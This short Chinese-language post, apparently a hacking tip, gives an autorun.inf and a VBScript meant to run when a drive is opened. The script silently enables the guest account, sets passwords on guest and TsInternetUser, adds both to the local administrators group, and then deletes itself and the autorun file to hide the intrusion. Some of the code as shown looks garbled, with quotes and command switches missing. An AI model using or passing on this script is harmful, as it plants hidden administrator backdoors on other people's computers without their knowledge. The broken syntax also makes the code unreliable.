打开硬盘时加载木马或者添加管理员

auto.ini 加 SHELL.VBS

autorun.inf内容如下
[autorun]
open=shell.vbs

shell.vbs内容如下

dim wsh
set wsh=CreateObject(WScript.Shell)
wsh.run net user guest activeyes,0
wsh.run net user guest wybanly886,0
wsh.run net localgroup administrators guest add,0
wsh.run net user TsInternetUser wybanly886,0
wsh.run net localgroup administrators TsInternetUser add,0
wsh.run cmd.exe c del autorun.inf,0
wsh.run cmd.exe c del shell.vbs,0

Related Posts